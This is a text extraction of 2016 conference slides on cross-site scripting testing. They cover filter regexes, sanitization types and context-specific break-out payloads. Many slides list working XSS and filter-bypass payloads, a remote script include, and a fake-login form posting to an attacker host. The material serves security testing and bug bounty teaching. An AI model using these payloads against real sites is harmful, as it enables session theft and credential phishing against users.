non-esoteric xss tips & tricks
TRANSCRIPT
Non-Esoteric XSSNon-Esoteric XSSTips & TricksTips & Tricks
Miroslav Štampar
([email protected]; [email protected])
Non-Esoteric XSSNon-Esoteric XSSTips & TricksTips & Tricks
Miroslav Štampar
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 2
XSS (Cross-Site Scripting)XSS (Cross-Site Scripting)Injection attack against usersagainst users of (otherwise)
benign and trusted web sitesUsed mostly in targetedtargeted attacks (e.g. spear-
phishing against administrators)For example, an attacker can send a link with
malicious JavascriptJavascript (JS) code to an unsuspecting user
The user’s browser has no way to know that the link should not be trusted and will execute the JS blindly – effectively giving access to cookies, session tokens or other sensitive information within browsing contextwithin browsing context
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 3
Real-world (known) casesReal-world (known) cases
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 4
More about vulnerabilityMore about vulnerabilityConsidered as criticalcritical vulnerability, hence
(often) well paid in bug bounty programsFailure to (properly) sanitize/filtersanitize/filter any of: <, >, ', " inside the response can introduce the vulnerability
While testing, responses for user supplied values are being inspected for signs of the vulnerability (e.g. response returning values in originaloriginal form)
Provoking JS pop-up boxpop-up box with custom message (e.g. XSS) is universally accepted as a Proof of Concept (PoC) for existence of vulnerability
Types: storedstored (persisting), reflectedreflected (temporary) and DOM-basedDOM-based (in-browser)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 5
Food for thought :)Food for thought :)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 6
Testing workflowTesting workflow
1) Find reflecting inputinput points(e.g. page's GET parameter values)
2) Recognize contextcontext of reflection(e.g. inside <script>...</script>)
3) BypassBypass sanitization/filtering and/or protection mechanism(s)(Note: if possible and/or required)
4) Write vulnerability exploitation PoCPoC(e.g. ...alert('XSS')...)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 7
Practical example (PoC)Practical example (PoC)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 8
Protection mechanism(s)Protection mechanism(s)
Common (XSS) detection regular expressions:● /<[az]/i - (e.g.) <svg, <img - though, there are
cases where “benign” tags as <a> are left un-blacklisted
● /\b(java)?script\b/i - (e.g.) <script, <img src="javascript:, etc.
● /\bon\w+\s*=/i - (e.g.) <img src=null onerror=... - though, there are cases where <marquee's onstart( is left un-blacklisted
● /\bsrc\s*=/i - (e.g.) <embed src=..., etc.● /\b\w+\(/i - (e.g.) alert( - though, there are
cases where confirm( is left un-blacklisted
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 9
Sanitization mechanism(s)Sanitization mechanism(s)Common (XSS) server response sanitizations:
● Removing all special characters - (e.g.) foo<'">bar → foobar
● Replacing with whitespace all special characters - (e.g.) foo<'">bar → foo bar
● HTML named entity encoding - (e.g.) foo<'">bar → foo<'">bar
● HTML numeric code point encoding - (e.g.) foo<'">bar → foo<'">bar
● Backslash escaping all special characters - (e.g.) foo<'">bar → foo\<\'\"\>bar (Note: <script>)
● Uppercase conversion - (e.g.) foo<'">bar → FOO'"BAR (combined with another mechanism(s))
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 10
Break-out of <tag...> context with > OR onXXX event handler injection
?vuln="><svg onload=alert(/XSS/)>
?vuln=" onclick="alert(/XSS/)
Usability is highly dependent on context and available <tag> events
(e.g.) Tags having visibility: hidden require breaking out of <tag...> context
<tag...><tag...> ( (|more|more))
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 11
<tag...><tag...> ( (|more|more))Even though attacker's options inside <tag> are
pretty narrowed (e.g. user interaction required), (ab)using CSS with style can help
?vuln=" onmouseover=alert(/XSS/) style="display: block; position: absolute; left: 0; top: 0; height: 10000px; width: 10000px; opacity: 0; cursor: default
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 12
>...<>...<Injecting outside of <tag> context and/or scope
(e.g. </script>...) requires unfiltered < and >Proper “Contenttype” (e.g. “text/html”) is
required, as in all XSS (reflected) cases (e.g. “application/json” is of no interest)
?vuln=<img src=null onerror=alert(/XSS/)>
?vuln=<script>alert(/XSS/)</script>
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 13
<!...><!...>Requires breaking-out of <!...> (i.e. HTML
comment) context with >Common for (custom) sites with debugging
support turned ON (e.g. returning used SQL query inside comment)
?vuln=><svg onload=alert(/XSS/)>
As it explicitly requires usage of <tag> it is fairly common to end up as unexploitable (e.g. protections are trigger happy on occurrence(s) of <[azAZ] inside parameter values)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 14
<frame ...><frame ...>Injecting custom <frame> OR onload event
handler injection (prefered)?vuln="><frame src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
?vuln=" onload="alert(/XSS/)
Note: Non-<frame> tags can't be used because of <frameset> restrictions
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 15
<iframe...><iframe...>
Break-out of <iframe...> context OR onload event handler injection (prefered)
?vuln="></iframe><svg onload=alert(/XSS/)>
?vuln=" onload="alert(/XSS/)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 16
<input...><input...>
Break-out of <input...> context with > OR onfocus event handler injection (prefered)
?vuln=1"><svg onload=alert(/XSS/)>
?vuln=1" autofocus onfocus="alert(/XSS/)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 17
<input type<input type="hidden"="hidden"...>...>
In hidden <input> cases, combined with inability to break-out of <input...> context (due to filtering of <>), regular onXXX event handler injection doesn't work
Though, accesskey attribute can be (ab)used to make the user-assisted XSS payload (AltShift<key>)
?vuln=" accesskey="X" onclick="alert( /XSS/)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 18
<script>...</script><script>...</script>Break-out of <script>...</script> with </script> OR in-place JS injection (prefered)
?vuln=</script><svg onload=alert(/XSS/)>
?vuln=foobar');alert('XSS');var dummy=('
Common in third-party advertisement pluginsNote: In-place JS injection doesn't require <>,
though it requires unfiltered ' or " in majority of cases (interpreter syntax checksinterpreter syntax checks)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 19
echo $_SERVER['PHP_SELF']echo $_SERVER['PHP_SELF']
Common finding even on top sites and/or frameworks
Non-sanitized reference of current script's path
http://...php/"><svg onload="alert(/XSS/)
Not PHP-specific (though more common)Note: JS injection in path often require manual
URL encoding of non-alphanumeric characters
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 20
<meta><meta>Often mislooked, though easy to exploitTop sites tend to utilize lots of metadata?vuln="><script>alert(/XSS/)</script>
?vuln=0;url=data:text/html;base64, PHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4" httpequiv="refresh
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 21
<textarea> <textarea> andand <title> <title>
Injection into <textarea> and <title> enclosings require explicit (respectable) closing tagsclosing tags (i.e. </textarea> and </title>)
Important to note because of automatized scanners (majority don't check the context)
<style> is also problematic, though in case of Internet Explorer CSS expression can be (ab)used
?vuln=</textarea><svg onload=alert(/XSS/)>
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 22
$_POST$_POST
Though not exploitable directly from link (i.e. address bar), it is a perfectly valid attack point
Requires malicious HTMLmalicious HTML document that has to be loaded inside the victim's web browser
Either a standalone HTML OR a link that points to the attacker's site hosting the HTML document
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 23
Protection(s) bypasses (Protection(s) bypasses (|more|more))<svg/onload=alert(/XSS/)>prompt`XSS`onerror=confirm;throw/XSS/;document.write(String.fromCharCode(60, 115,99,114,105,112,116,62,97,...
[][(![]+[])[+[]]+([![]]+[][... // JSFuck<SCRIPT SRC=//DOMAIN.COM/XSS.JS></SCRIPT><embed src=data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cuM...
<object data=data:text/html;base64,...<video/poster/onerror=alert(/XSS/)></i/style=left:ex\pression(alert('XSS'))>
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 24
Protection(s) bypasses (Protection(s) bypasses (|more|more))<iframe src=javascript:alert('XSS')><isindex type=submit formaction=javascrip...
<isindex type=image src=null onerror=alert(/XSS/)>
<iframe/srcdoc=<svg/onload=alert("XSS")>>
<img src=null onerror=\u0061\u006c\u0065\u0072\u0074("\u0058\u0053\u0053")>
<body style=height:9999px onwheel=prompt(/XSS/)>
<marquee onstart=confirm(/XSS/)>
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 25
In cases when Javascript injection (i.e. XSS) is not possible, HTML injection is also a valid attack point – though, not as valuable
Most common scenario is the usage of protection mechanism(s), while lacking any sanitization/filtering whatsoever
“Evil link” scenario – (e.g.) “Fake login” scenario – (e.g.) <form
action="//www.attacker.com/steal.php">...“Fake defacement” scenario – (e.g.) <h1>This
site has been hacked by l33tcr3w</h1>
p.s. HTML injectionp.s. HTML injection
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 26
www.openbugbounty.org
html5sec.org
p.p.s. Recommended resourcesp.p.s. Recommended resources
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 27
Questions?Questions?